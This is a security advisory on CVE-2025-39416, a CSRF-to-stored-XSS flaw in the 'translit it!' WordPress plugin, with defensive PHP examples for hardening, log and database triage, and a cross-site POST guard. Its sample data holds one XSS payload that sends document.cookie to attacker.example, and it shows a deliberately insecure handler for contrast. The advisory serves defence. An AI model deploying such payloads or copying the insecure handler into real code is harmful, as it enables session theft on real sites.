CVE-2025-39416 Overview
CVE-2025-39416 is a Cross-Site Request Forgery (CSRF) vulnerability in the Ichi translit it! WordPress plugin (translit-it) that leads to Stored Cross-Site Scripting (XSS). The flaw affects all plugin versions up to and including 1.6. An attacker can craft a malicious page that, when visited by an authenticated administrator, submits a forged request to the plugin and persists attacker-controlled JavaScript in the WordPress database. Subsequent visitors to the affected pages execute the injected script in their browser session.
Critical Impact
A successful attack stores arbitrary JavaScript in the WordPress site, enabling session theft, administrative action hijacking, and malicious redirection of site visitors.
Affected Products
- WordPress plugin: Ichi translit it! (translit-it)
- All versions up to and including 1.6 (the NVD record gives no lower bound, listed as n/a)
- WordPress sites with the plugin installed and active
Discovery Timeline
- 2025-04-17 - CVE-2025-39416 published to NVD
- 2026-04-23 - Last updated in NVD database
Technical Details for CVE-2025-39416
Vulnerability Analysis
The vulnerability chains two weaknesses: missing CSRF protection [CWE-352] and insufficient output sanitization that allows stored XSS. The plugin exposes a state-changing administrative endpoint that does not validate a WordPress nonce or verify the origin of the request. User-supplied input submitted through that endpoint is persisted without adequate sanitization or contextual output encoding.
Exploitation requires user interaction: an administrator who is logged in to the target site must load an attacker-controlled page. The browser attaches the administrator's session cookies to the forged request, so the plugin treats it as a legitimate settings change and saves the payload into plugin settings or other content it renders. Because the payload is stored server-side, it then executes in the browser of every user who loads the affected page. A one-time CSRF against a single administrator therefore becomes persistent XSS against all visitors, and the script runs in the security context of the victim site's origin rather than the attacker's page.
Root Cause
The root cause is a privileged plugin handler that accepts state-changing requests without an anti-CSRF token, combined with missing input sanitization and output escaping. WordPress provides wp_nonce_field() and check_admin_referer() (or wp_verify_nonce()) for CSRF protection, current_user_can() for authorization, sanitize_text_field() and wp_kses() for input sanitization, and escaping helpers such as esc_html() and esc_attr() for output. The plugin does not enforce these controls on the vulnerable handler in any version through 1.6.
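The pattern below is an added illustration, not code from the translit-it plugin: a hypothetical WordPress settings handler (the example_ names and the option key are assumptions) written first in the vulnerable shape described above, then with the WordPress controls applied. Only the hardened functions are hooked, so the file is safe to load.

```php
<?php
// Added example (not the translit-it plugin's code): a hypothetical settings
// handler showing the CWE-352 + stored XSS pattern and its fix. Names prefixed
// example_ and the option key 'example_translit_settings' are assumptions.

// --- Vulnerable shape (shown for contrast, deliberately not hooked) ----------
// Any cross-site POST carrying the admin's cookies reaches update_option():
// no capability check, no nonce, no sanitization, and the raw value is later
// echoed without escaping, so a stored <script> survives into the page.
function example_translit_save_vulnerable() {
    update_option('example_translit_settings', $_POST['settings']);
    wp_safe_redirect(admin_url('options-general.php?page=example-translit'));
    exit;
}

function example_translit_render_vulnerable() {
    // Unescaped output: the stored payload executes for every viewer of this page.
    echo '<div class="translit-output">' . get_option('example_translit_settings', '') . '</div>';
}

// --- Hardened shape -----------------------------------------------------------
function example_translit_settings_form() {
    echo '<form method="post" action="' . esc_url(admin_url('admin-post.php')) . '">';
    echo '<input type="hidden" name="action" value="example_translit_save">';
    // Emits the _example_translit_nonce field (plus _wp_http_referer); the nonce
    // is bound to this action and to the logged-in user's session.
    wp_nonce_field('example_translit_save', '_example_translit_nonce');
    $current = get_option('example_translit_settings', '');
    // Attribute context: esc_attr() for the value being echoed into value="...".
    echo '<input type="text" name="settings" value="' . esc_attr($current) . '">';
    submit_button();
    echo '</form>';
}

function example_translit_save_hardened() {
    // 1. Authorization: only users who may manage options.
    if (!current_user_can('manage_options')) {
        wp_die(esc_html__('You are not allowed to change these settings.'), '', ['response' => 403]);
    }
    // 2. CSRF: check_admin_referer() dies with a 403 if the nonce is missing or invalid.
    check_admin_referer('example_translit_save', '_example_translit_nonce');
    // 3. Input sanitization: wp_unslash() removes WordPress' added slashes,
    //    sanitize_text_field() strips tags, octets and line breaks.
    $raw   = isset($_POST['settings']) ? wp_unslash($_POST['settings']) : '';
    $clean = sanitize_text_field($raw);
    update_option('example_translit_settings', $clean);
    wp_safe_redirect(add_query_arg('updated', '1', admin_url('options-general.php?page=example-translit')));
    exit;
}

function example_translit_render_hardened() {
    // 4. Output escaping in the HTML-text context, even though the value was
    //    sanitized on the way in: defence in depth against other write paths.
    echo '<div class="translit-output">' . esc_html(get_option('example_translit_settings', '')) . '</div>';
}

// Wire the hardened handler to admin-post.php and the form to a settings page.
add_action('admin_post_example_translit_save', 'example_translit_save_hardened');
add_action('admin_menu', function () {
    add_options_page('Translit example', 'Translit example', 'manage_options',
        'example-translit', 'example_translit_settings_form');
});
```

The two fixes are independent: the nonce stops a cross-site page from driving the handler, and sanitize-on-input plus escape-on-output stops whatever does reach the database from becoming executable markup. Either one alone would have broken this chain; both are expected of any WordPress handler that writes state.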
Attack Vector
The attack is network-based and requires no privileges on the target site, only that a privileged user visit a malicious page. The attacker hosts an HTML page containing an auto-submitting form or fetch request targeting the plugin endpoint. When an authenticated administrator loads that page, the browser issues the cross-site request, and the plugin processes it as a legitimate administrative action. The injected script then persists and runs in the browser of every user who renders the affected output. Refer to the Patchstack Vulnerability Report for additional technical detail.
Detection Methods for CVE-2025-39416
Indicators of Compromise
- Unexpected <script> tags, event handlers (onerror, onload), or obfuscated JavaScript stored in wp_options or post content tied to the translit-it plugin.
- Outbound browser requests from site visitors to unfamiliar domains shortly after page render.
- Plugin configuration changes that the administrator they are attributed to does not recognize. A forged request runs under that administrator's own session, so activity logs record the change as theirs; the indicator is the unexpected change, not a missing log entry.
Detection Strategies
- Audit the WordPress database for plugin-managed settings containing HTML or JavaScript that should not be present.
- Inspect HTTP access logs for POST requests to plugin admin endpoints (admin-post.php, admin-ajax.php, options.php) whose Origin or Referer header points to an external origin, or whose Sec-Fetch-Site header is cross-site. Configure the web server to log those headers; Referer alone is unreliable because Referrer-Policy can strip it.
- Review browser-side Content Security Policy (CSP) violation reports for inline script blocks originating from plugin-rendered pages.
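The script below is an added example covering the first two strategies (database audit and access-log review); it is not part of the original advisory or the plugin. The option rows and log lines are constructed, and the log format assumes the server has been configured to append the Origin and Sec-Fetch-Site headers after the user agent (for example with Apache %{Origin}i and %{Sec-Fetch-Site}i).

```php
<?php
// Added example (not part of the advisory or the plugin): offline triage helpers
// for CVE-2025-39416. Sample rows and log lines are constructed for illustration.

// Markup that has no business in transliteration settings or plain-text content.
// A triage heuristic: it does not decode entities, base64 or data: URLs.
const EXAMPLE_SUSPICIOUS_MARKUP =
    '/<\s*script\b|<\s*iframe\b|\bon(?:error|load|click|mouseover|focus|toggle|animationstart)\s*=|javascript\s*:|\bsrcdoc\s*=/i';

/** Rows are ['name' => option_name or post ID, 'value' => stored text]. */
function example_find_suspicious_values(array $rows): array {
    $hits = [];
    foreach ($rows as $row) {
        if (preg_match(EXAMPLE_SUSPICIOUS_MARKUP, (string) $row['value'], $m)) {
            $hits[] = ['name' => $row['name'], 'match' => $m[0]];
        }
    }
    return $hits;
}

/**
 * Flags POSTs under /wp-admin/ that the browser marked as cross-site.
 * Precedence: Sec-Fetch-Site, then Origin, then Referer. A missing Origin or
 * Referer is not a hit on its own, since Referrer-Policy can legitimately strip them.
 */
function example_find_cross_site_admin_posts(array $lines, string $site_host): array {
    // Combined log format with two extra quoted fields: Origin and Sec-Fetch-Site.
    $pattern = '/"POST (\S+) HTTP\/[\d.]+" \d{3} \S+ "([^"]*)" "[^"]*" "([^"]*)" "([^"]*)"$/';
    $hits = [];
    foreach ($lines as $line) {
        if (!preg_match($pattern, $line, $m)) {
            continue;
        }
        [, $path, $referer, $origin, $fetch_site] = $m;
        if (strpos($path, '/wp-admin/') !== 0) {
            continue;
        }
        $reason = null;
        if (strtolower($fetch_site) === 'cross-site') {
            $reason = 'Sec-Fetch-Site: cross-site';
        } elseif ($origin !== '' && $origin !== '-'
                  && strcasecmp((string) parse_url($origin, PHP_URL_HOST), $site_host) !== 0) {
            $reason = 'Origin ' . $origin;
        } elseif ($referer !== '' && $referer !== '-'
                  && strcasecmp((string) parse_url($referer, PHP_URL_HOST), $site_host) !== 0) {
            $reason = 'Referer ' . $referer;
        }
        if ($reason !== null) {
            $hits[] = ['path' => $path, 'reason' => $reason];
        }
    }
    return $hits;
}

// ---- Constructed sample data -------------------------------------------------
$sample_rows = [
    ['name' => 'example_translit_settings', 'value' => 'ru-latin'],
    ['name' => 'example_translit_suffix',   'value' => '<img src=x onerror="fetch(\'https://attacker.example/?c=\'+document.cookie)">'],
    ['name' => 'blogname',                  'value' => 'Button Emporium'],  // "on" inside a word must not trigger
];

$sample_log = [
    '203.0.113.5 - - [17/Apr/2025:10:01:02 +0000] "POST /wp-admin/admin-post.php HTTP/1.1" 302 0 "https://blog.example/wp-admin/options-general.php" "Mozilla/5.0" "https://blog.example" "same-origin"',
    '203.0.113.5 - - [17/Apr/2025:10:03:14 +0000] "POST /wp-admin/admin-post.php HTTP/1.1" 302 0 "https://attacker.example/lure.html" "Mozilla/5.0" "https://attacker.example" "cross-site"',
    '198.51.100.9 - - [17/Apr/2025:10:04:30 +0000] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 12 "-" "Mozilla/5.0" "-" "-"',
    '198.51.100.9 - - [17/Apr/2025:10:05:00 +0000] "GET /wp-admin/ HTTP/1.1" 200 812 "https://attacker.example/" "Mozilla/5.0" "-" "cross-site"',
];

if (PHP_SAPI === 'cli') {
    print_r(example_find_suspicious_values($sample_rows));                      // flags example_translit_suffix only
    print_r(example_find_cross_site_admin_posts($sample_log, 'blog.example'));  // flags the 10:03:14 POST only
}
```

Run it with php scan.php to see the two hits. Against a live site, replace $sample_rows with $wpdb->get_results("SELECT option_name AS name, option_value AS value FROM {$wpdb->options}", ARRAY_A) (and the same for post_content from {$wpdb->posts}) and execute it with wp eval-file scan.php. The markup regex is deliberately narrow so it can be read; an empty result means "nothing obvious", not "clean", because encoded payloads will slip past it.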
Monitoring Recommendations
- Monitor WordPress administrator sessions for activity originating outside expected IP ranges or user agents.
- Alert on modifications to plugin configuration tables and post metadata associated with translit-it.
- Track file integrity and database changes through a WordPress security plugin or external SIEM ingestion.
How to Mitigate CVE-2025-39416
Immediate Actions Required
- Deactivate and remove the translit it! plugin until a fixed release is verified available from the vendor.
- If stored script is found, force a password reset for all WordPress administrator accounts and invalidate their active sessions, since the payload may already have captured cookies or performed actions as an administrator.
- Scan the database and rendered pages for stored JavaScript and remove any malicious entries.
Patch Information
No fixed version is identified in the available advisory data. Versions through <= 1.6 remain vulnerable. Review the Patchstack Vulnerability Report and the WordPress.org plugin page for an updated release before re-enabling the plugin.
Workarounds
- Restrict access to /wp-admin/ by IP allowlist at the web server or WAF layer. Note the limit: a forged request is sent by the administrator's own browser, so it passes the allowlist whenever the administrator is on an allowed network; the allowlist only protects administrators browsing from elsewhere. A WAF rule that rejects POSTs to /wp-admin/ carrying Sec-Fetch-Site: cross-site, or an Origin that does not match the site host, addresses the CSRF step directly.
- Deploy a Content Security Policy that disallows inline scripts on public-facing pages to limit stored XSS execution. WordPress core, themes and other plugins emit inline scripts of their own, so roll the policy out as Content-Security-Policy-Report-Only first and add nonces or hashes for the legitimate inline blocks before enforcing it.
- Require administrators to use isolated browser profiles for WordPress administration and avoid browsing untrusted sites in the same session.
# Configuration example: deactivate and remove the vulnerable plugin via WP-CLI
wp plugin deactivate translit-it
wp plugin delete translit-it
# Confirm removal: no row should be printed for the slug
wp plugin list --name=translit-it
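The must-use plugin below is an added example of the cross-site POST check mentioned under Workarounds, implemented in WordPress itself rather than at the WAF; it is not part of translit-it and the example_ names are assumptions. The decision logic is a pure function so it can be checked offline; the WordPress hook is only registered when the file is loaded by WordPress.

```php
<?php
/**
 * Plugin Name: Example cross-site admin POST guard
 * Description: Added example for CVE-2025-39416 mitigation, not part of translit-it.
 *              Drop into wp-content/mu-plugins/ to load it before normal plugins.
 */

/**
 * Decide whether an admin-area POST came from another site.
 * Precedence: Sec-Fetch-Site (set by all current browsers), then Origin, then Referer.
 * With no signal at all the request is allowed, so scripted clients and very old
 * browsers are not broken; this is defence in depth, not a replacement for nonces.
 */
function example_is_cross_site_request(array $headers, string $site_host): bool {
    $fetch_site = strtolower(trim($headers['sec-fetch-site'] ?? ''));
    if ($fetch_site !== '') {
        return $fetch_site === 'cross-site';   // same-origin, same-site and none are allowed
    }
    foreach (['origin', 'referer'] as $name) {
        $value = trim($headers[$name] ?? '');
        if ($value === '') {
            continue;
        }
        if ($value === 'null') {
            return true;   // opaque origin (sandboxed frame, data: URL): never a same-site form
        }
        $host = parse_url($value, PHP_URL_HOST);
        return strcasecmp((string) $host, $site_host) !== 0;
    }
    return false;
}

if (function_exists('add_action')) {
    // admin_init fires for wp-admin pages, admin-post.php and admin-ajax.php,
    // before any admin_post_* or wp_ajax_* handler runs.
    add_action('admin_init', function () {
        if (($_SERVER['REQUEST_METHOD'] ?? 'GET') !== 'POST') {
            return;
        }
        $headers = [
            'sec-fetch-site' => $_SERVER['HTTP_SEC_FETCH_SITE'] ?? '',
            'origin'         => $_SERVER['HTTP_ORIGIN'] ?? '',
            'referer'        => $_SERVER['HTTP_REFERER'] ?? '',
        ];
        $site_host = (string) parse_url(site_url(), PHP_URL_HOST);
        if (example_is_cross_site_request($headers, $site_host)) {
            wp_die(esc_html__('Cross-site POST to the admin area rejected.'), '', ['response' => 403]);
        }
    }, 0);
}

// Stand-alone self-check (php guard.php); skipped when loaded by WordPress.
if (PHP_SAPI === 'cli' && !function_exists('add_action')) {
    $site  = 'blog.example';
    $cases = [   // [headers, expected cross-site?]
        [['sec-fetch-site' => 'cross-site'], true],
        [['sec-fetch-site' => 'same-origin', 'origin' => 'https://blog.example'], false],
        [['origin' => 'https://attacker.example'], true],
        [['origin' => 'null'], true],
        [['referer' => 'https://blog.example/wp-admin/options-general.php'], false],
        [['referer' => 'https://attacker.example/lure.html'], true],
        [[], false],
    ];
    foreach ($cases as [$headers, $expected]) {
        if (example_is_cross_site_request($headers, $site) !== $expected) {
            fwrite(STDERR, "self-check failed for " . json_encode($headers) . "\n");
            exit(1);
        }
    }
    echo "self-check passed\n";
}
```

Test this on a staging copy before production: any integration that legitimately POSTs to admin-ajax.php from another origin will receive a 403. If site_url() and the host administrators actually use differ (reverse proxies, alternate admin hostnames), pass the correct host instead.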
Disclaimer: This content was generated using AI. While we strive for accuracy, please verify critical information with official sources.


